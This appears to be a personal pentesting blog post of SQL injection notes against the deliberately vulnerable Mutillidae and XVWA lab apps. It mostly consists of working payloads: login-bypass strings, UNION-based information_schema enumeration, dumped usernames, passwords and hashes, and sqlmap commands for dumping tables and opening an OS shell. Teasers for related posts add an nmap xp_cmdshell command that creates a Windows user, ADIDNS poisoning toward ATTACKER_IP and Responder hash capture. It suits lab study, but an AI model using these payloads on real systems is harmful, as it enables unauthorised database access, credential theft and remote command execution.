Skip to main content

SQL INJECTION

By
SQL INJECTION
-----------------------------------------------------------------------------------
=============================== SQL INJECTION =====================================
-----------------------------------------------------------------------------------

mysql -u root -h 192.168.149.128
show databases;
use owasp10
show tables;
select * from accounts
------------------------------------
DISCOVERING SQL INJECTION IN POST
-------------------------------------

go to any login pages  which uses sql

Enter '  in the login and password boxes and see the output



Select * from accounts where username= 'zaid' and password='123456'

give a correct username --> noob

1234' and 1=1#

or

"" or 1=1 --"

Its Select * from accounts where username= 'zaid' and password='PASSWORD' and 1=1 #'

--------------------------------------------------------------------------

Hacking MySql DB password
-------------------------

Select * from accounts where username= 'zaid' and password='anytext' or 1=1 #'

anytext' or 1=1 #

----------------------------------------------------------------------------

Hacking Username and password
-----------------------------

Select * from accounts where username= 'admin' #' and password='anytext' or 1=1 #'

admin' #

Select * from accounts where username= 'admin'
// Because of the #(comment) rest of the query will not be executed and we cam bypass login

-----------------------------------------------------------------------------------------------
========================== HACKING Medium SQL DATABAES ===================================
-----------------------------------------------------------------------------------------------
sql injection can be stopped by 2 methods --> client side filtering and serve side filtering

client side filter can be hacked by using burpsuite

change the password parameter in the request tab

------------------------------------------------------------------------------------------------
========================== Exploiting GET Requests in SQL===================================
-----------------------------------------------------------------------------------------------

index.php?page=user-info.php&username=admin&password=adminpass&user-info-php-submit
-button=View+Account+Details

change it to
-------------------------:
'order by 1%23           :
-------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob' order by 1%23&password=1234&user-info-php-submit-button=View+Account+Details

%number is only used when typing the command in the address bar

%20 = space
%23 = #
%27 = '

--------------------------:
'union select 1,2,3,4,5%23:
--------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,2,3,4,5%23&password=1234&user-info-php-submit-button=View+Account+Details

here 1,5 are occupied

only 2,3,4 showed the outputs which we can modify

-------------------------------------------------:
'union select 1,database(),user(),version(),5%23 :
-------------------------------------------------:
http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,database(),user(),version(),5%23&password=1234&user-info-php-submit-button=View+Account+Details
                   ------------------------------------------------
 
Information Schema: it is a default database created by mysql, it contains all the information about all other databases

-------------------------------------------------------------------------:
'union select 1,table_name,null,null,5 from information_schema.tables%23 :
-------------------------------------------------------------------------:

.tables = table
information_schema = database
table_name = column

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,table_name,null,null,5 from information_schema.tables%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 238 records found.// Shows the records of all the dbs in the server/db


-------------------------------------------------------------------------------------------------------:
'union select 1,table_name,null,null,5 from information_schema.tables where table_schema= 'owasp10'%23 :
-------------------------------------------------------------------------------------------------------:

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,table_name,null,null,5 from information_schema.tables where table_schema= 'owasp10'%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 8 records found.

Username=accounts
Password=
Signature=

Username=blogs_table
Password=
Signature=

Username=captured_data
Password=
Signature=

Username=credit_cards
Password=
Signature=

Username=hitlog
Password=
Signature=

Username=pen_test_tools
Password=
Signature=


So, we found out the columns in the db, lets dig deeper into the database
to check the data in a particular column, the command is

--------------------------------------------------------------------------------------------------------:
'union select 1,column_name,null,null,5 from information_schema.columns where table_name= 'accounts'%23 :
--------------------------------------------------------------------------------------------------------:

192.168.149.136/mutillidae/index.php?page=user-info.php&username=noob'union select 1,column_name,null,null,5 from information_schema.columns where table_name= 'accounts'%23&password=1234&user-info-php-submit-button=View+Account+Details

Results for . 7 records found.

Username=cid
Password=
Signature=

Username=username
Password=
Signature=

Username=password
Password=
Signature=

Username=mysignature
Password=
Signature=

Username=is_admin
Password=
Signature=


so, the columns in the accounts are  CID, username, password,mysignature,is_admin

so, lets get the usernames and passwords from the table


---------------------------------------------------------------:
'union select 1,username,password,is_admin,5 from accounts%23  :
---------------------------------------------------------------:

1,5 cant be substiuted as the data is not displyed in it when tested. so we are using only 2,3,4

Results for . 19 records found.
Username=noob
Password=1234
Signature=Freak

Username=noob
Password=1234
Signature=Noob

Username=admin
Password=adminpass
Signature=TRUE

Username=adrian
Password=somepassword
Signature=TRUE

Username=kevin
Password=42
Signature=FALSE

Username=dave
Password=set
Signature=FALSE

Username=ed
Password=pentest
Signature=FALSE

=============================================================================

==================================================== SQLMAP =====================================================================

sqlmap --help
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"

List all the databases:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --dbs

Current User:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-user

Current DB:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --current-db

Tables:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

Columns:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10

Dump:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump

OS Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --os-shell

SQL Shell:
sqlmap -u "http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details" --sql-shell
current_user()
user()
database()
select tablename from information_schema.table where table_schema = 'owasp10'



--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

' /try entering ' to check for sql injection
' order by 7#

2,4,5,6 are vulnerable


'union select 1,database(),3,user(),version(),6,7 #

'union select 1,table_name,3,null,null,null,7 from information_schema.table


'union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema= 'xvwa'#
--> users,caffine,comments

'union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name= 'users'#
uid, username, password

'union select 1,username,3,password,uid,6,7 from users#

tem Code : admin   Description : 1
Item Name : 21232f297a57a5a743894a0e4a801fc3
Category : 6

Item Code : xvwa   Description : 2
Item Name : 570992ec4b5ad7a313f5dc8fd0825395
Category : 6

Item Code : user   Description : 3
Item Name : 25890deab1075e916c06b9e1efc2e25f





Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more